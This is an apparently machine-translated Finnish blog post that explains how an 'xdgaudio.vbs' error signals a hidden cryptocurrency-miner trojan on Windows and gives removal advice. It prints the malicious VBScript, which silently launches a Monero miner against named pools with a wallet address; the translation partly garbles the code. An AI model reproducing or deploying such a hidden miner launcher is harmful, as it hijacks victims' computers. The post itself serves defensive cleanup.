Jos saat järjestelmässäsi seuraavan "xdgaudio.vbs" -virheilmoituksen, tietokoneesi on todennäköisesti saastunut.
Käsikirjoitus: C:\windows\xdgaudio.vbs
Rivi: 3
Merkki: 1
Virhe: Järjestelmä ei löydä määritettyä tiedostoa.
Koodi: 80070002
Lähde: (nolla)
Muistiolla muokattuna skripti voi sisältää alla olevia rivejä:
Himmeä WShell. Aseta WShell = CreateObject("WScript. Kuori") WShell. Suorita "wmipvrse.exe -B --donate-level 1 -r 100 --threads 16 --cpu-priority 2 --cpu-affinity 2 -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com: 8005 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJ7rk75aVKgRv. Sovellus -p x -k -o stratum+tcp://mine.moneropool.com: 3333 -u 42Mn2UkbubgBDSa4sk4p4GHfN1nfxw2nURQ5NQWT9xYnFiLzTYGPawKEWeQ7oG4eqiHbmvt7wqJD4bSyBzQJKgv7rk -p x", 0. Aseta WShell = Ei mitäänTämä näyttää varmasti CPU/cryptocurrency Miner -troijalaiselta, joka ei vain hidasta tietokonettasi, vaan voi myös muodostaa turvallisuusuhan. Skriptitiedostot c:\windows\xdgaudio.vbs
ja c:\windows\servicecrsssr.vbs pitäisi poistaa. Tuo ei riitä. Suorita perusteellinen tarkistus käyttämällä Malwarebytes-haittaohjelmia ja tarkista myös käyttämäsi virustorjuntaohjelmisto.Tarkat ohjeet tällaisen Miner Troijan poistamiseen ovat malwaretips.com-oppaassa CPU Miner Trojan poistaminen Windowsista (Virusohjeopas).
Yksi pieni pyyntö: Jos pidit tästä viestistä, jaa tämä?
Yksi "pieni" jakaminen sinulta auttaisi todella paljon tämän blogin kasvussa. Muutamia hienoja ehdotuksia:- Kiinnittää sen!
- Jaa se suosikkiblogiisi + Facebookiin, Redditiin
- Twiittaa se!